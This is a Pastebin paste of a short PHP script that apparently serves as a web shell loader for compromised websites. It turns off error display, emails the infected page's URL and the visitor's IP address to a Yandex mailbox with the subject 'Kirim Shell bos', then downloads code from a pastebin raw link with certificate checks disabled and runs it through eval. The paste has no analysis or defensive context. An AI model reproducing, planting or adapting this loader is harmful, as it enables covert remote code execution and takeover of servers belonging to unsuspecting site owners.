Advertisement
Sl4ckerc0de

Untitled

May 28th, 2019
121
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. @ini_set('output_buffering', 0);
  3. @ini_set('display_errors', 0);
  4. set_time_limit(0);
  5. ini_set('memory_limit', '64M');
  6. header('Content-Type: text/html; charset=UTF-8');
  7. $tujuanmail = 'tuyulmama@yandex.com';
  8. $x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
  9. $pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
  10. mail($tujuanmail, "Kirim Shell bos", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
  11. function get_contents($url){
  12. $ch = curl_init("$url");
  13. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  14. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  15. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  16. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  17. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  18. curl_setopt($ch, CURLOPT_COOKIEJAR,$GLOBALS['coki']);
  19. curl_setopt($ch, CURLOPT_COOKIEFILE,$GLOBALS['coki']);
  20. $result = curl_exec($ch);
  21. return $result;
  22. }
  23.  
  24. $a = get_contents('https://pastebin.com/raw/9NgkF0pd');
  25. eval('?>'.$a);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement